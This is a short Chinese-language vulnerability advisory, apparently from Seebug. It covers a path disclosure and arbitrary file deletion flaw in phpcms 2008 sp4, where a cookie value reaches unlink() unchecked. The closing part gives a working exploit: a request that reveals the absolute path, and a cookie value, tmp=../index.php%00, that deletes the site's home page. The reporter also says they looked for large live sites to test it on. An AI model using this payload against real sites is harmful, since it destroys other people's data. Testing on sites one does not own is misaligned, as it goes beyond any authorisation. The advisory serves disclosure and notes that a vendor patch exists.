phpcms 2008 sp4 爆路径及任意文件删除漏洞

2010-10-08T00:00:00
ID SSV:20150
Type seebug
Reporter Root
Modified 2010-10-08T00:00:00

Description

未作容错处理导致爆路径,同时过滤不严导致恶意攻击者可以删除网站任意文件

corpandresize/config.inc.php中定义:

$tmp = $_COOKIE['tmp']; define("TMP_PATH", $tmp);

在corpandresize/process.php中用到TMP_PATH,满足前面的一系列条件后(这个很好满足,都是用户可控的):

76: @unlink(TMP_PATH.'/'.$thumbfile);

没有检查$_COOKIE['tmp']就直接放入unlink()了,只要修改cookie就可以删除网站的任意文件。

google了一下,发现网上有人在今年5月份公开过同目录下另一个文件造成的爆路径问题(http://lcx.cc/?FoxNews=123.html),但分析得不够详细,利用方法也稍显麻烦,这里给出的利用方式更简单。

phpcms 2008 sp4 厂商补丁: PHPCMS


目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.phpcms.cn

                                        
                                            
                                                注册用户登陆后访问

http://localhost/phpcms/corpandresize/process.php?pic=../images/logo.gif

此时爆出绝对路径(当收集信息,没什么好利用的)
在cookie中添加一句(或修改原有值)tmp=../index.php%00即可删除首页文件
测试的时候发现官方demo站不成功。。。但是本地测试ok(官方最新安装包),在网上找大站测试